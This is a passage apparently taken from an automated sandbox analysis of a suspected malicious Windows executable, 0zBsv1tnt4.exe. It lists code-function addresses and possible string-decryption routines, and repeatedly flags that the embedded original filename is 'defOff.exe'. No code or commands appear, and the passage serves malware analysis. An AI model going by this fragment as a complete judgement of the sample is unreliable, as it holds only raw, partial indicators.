Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00972E6D	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00962750	0_2_00962750
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097C09E	0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009888B0	0_2_009888B0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096C8A0	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009838D0	0_2_009838D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097A0CA	0_2_0097A0CA
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096B8F6	0_2_0096B8F6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097C0E6	0_2_0097C0E6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009660E9	0_2_009660E9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096D003	0_2_0096D003
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095D83C	0_2_0095D83C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095D021	0_2_0095D021
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095C840	0_2_0095C840
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098F18B	0_2_0098F18B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097E180	0_2_0097E180
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009739B9	0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009791AE	0_2_009791AE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009781CC	0_2_009781CC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009909E0	0_2_009909E0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097C9EB	0_2_0097C9EB
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00B069CC	0_2_00B069CC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00976910	0_2_00976910
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00955901	0_2_00955901
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097C09E	0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095397B	0_2_0095397B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00956160	0_2_00956160
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096E960	0_2_0096E960
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00968169	0_2_00968169
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00989A80	0_2_00989A80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00978ABC	0_2_00978ABC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00969AD0	0_2_00969AD0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009742D0	0_2_009742D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096E220	0_2_0096E220
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098DA4D	0_2_0098DA4D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00985A4F	0_2_00985A4F
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098CA40	0_2_0098CA40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00954270	0_2_00954270
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096EB80	0_2_0096EB80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009573D0	0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009783D8	0_2_009783D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095F3C0	0_2_0095F3C0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00959310	0_2_00959310
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00968B1B	0_2_00968B1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095AB40	0_2_0095AB40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00971340	0_2_00971340
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097F377	0_2_0097F377
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00964CA0	0_2_00964CA0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009704C6	0_2_009704C6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095D4F3	0_2_0095D4F3
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00981CF0	0_2_00981CF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009724E0	0_2_009724E0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00983C10	0_2_00983C10
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098A440	0_2_0098A440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096747D	0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00987DA9	0_2_00987DA9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098A5D4	0_2_0098A5D4
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00955DC0	0_2_00955DC0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098CDF0	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096051B	0_2_0096051B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00989D30	0_2_00989D30
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097C53C	0_2_0097C53C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00976D2E	0_2_00976D2E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00961D2B	0_2_00961D2B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097CD5E	0_2_0097CD5E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097CD4C	0_2_0097CD4C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098FD70	0_2_0098FD70
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00974560	0_2_00974560
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096AEB0	0_2_0096AEB0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009746D0	0_2_009746D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009906F0	0_2_009906F0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096961B	0_2_0096961B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098FE00	0_2_0098FE00
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095F60D	0_2_0095F60D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096E630	0_2_0096E630
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00988650	0_2_00988650
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097FE74	0_2_0097FE74
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097EE63	0_2_0097EE63
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00970E6C	0_2_00970E6C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00959780	0_2_00959780
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00975F1B	0_2_00975F1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00979739	0_2_00979739
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00966F52	0_2_00966F52
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00977740	0_2_00977740

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: String function: 00957F60 appears 40 times
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: String function: 00964C90 appears 74 times

Sample file is different than original file name gathered from version info

Source: 0zBsv1tnt4.exe	Binary or memory string: OriginalFilename vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753508017.0000000005F93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747939925.0000000005F87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753200505.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741106166.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748641218.0000000005F90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747377089.0000000005F89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755710718.00000000060CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742054561.00000000060F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742641403.0000000006055000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740839803.0000000005DEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742152200.0000000005F89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741014373.000000000602D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747522970.000000000608F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743489115.0000000005F94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741858552.0000000005F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742744377.0000000005F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745026931.000000000606F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749386939.00000000060A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740481105.0000000005F91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746607777.0000000005F8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756929032.00000000060DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754904265.00000000060C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746479114.0000000006181000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741476081.00000000060D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754281518.00000000061EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744751091.0000000006068000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748897132.00000000061B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747118596.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743741710.0000000005F93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740389976.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749584722.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748356756.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744105460.0000000006064000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756772508.0000000005F89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743374680.0000000006123000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741958081.0000000006038000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747805245.000000000618E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742336878.0000000006043000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749848322.00000000060A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742541445.0000000005F8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746989670.000000000608D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745145340.0000000005F89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753817708.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1751446021.00000000060B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754126968.00000000060B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741669573.0000000006033000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744232506.000000000613E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746090034.0000000006085000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743611102.0000000006059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755218944.00000000060C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743262102.000000000604C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741763407.00000000060E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740571438.0000000005DE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746216617.0000000005F93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741568865.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782456195.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748780223.000000000609B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746738659.0000000006091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756118663.0000000006225000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744328710.0000000005F90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741289529.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755437071.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748509228.0000000006097000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742950074.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745418315.0000000006163000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743052594.0000000006054000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1750849182.0000000005F92000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754602705.00000000060D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742441245.0000000006101000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754446126.0000000005F94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1750190869.00000000061BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754752682.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1757248589.00000000060DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1752408659.0000000005F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740927812.0000000005F93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743156369.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744452780.0000000006066000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748217188.0000000006190000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745262579.000000000606C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746350752.0000000006084000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753356306.00000000061CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745633174.0000000005F8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748075823.0000000006089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740750624.0000000006024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741197031.0000000006035000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755062115.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743865487.0000000006062000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753968777.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744891784.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743977874.0000000005F87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756399432.0000000005F94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742848021.0000000006049000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753664817.00000000060C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1877406895.0000000006516000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756610935.00000000060DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741382035.0000000006029000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740289499.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1876753898.000000000624B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1757085700.0000000005F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
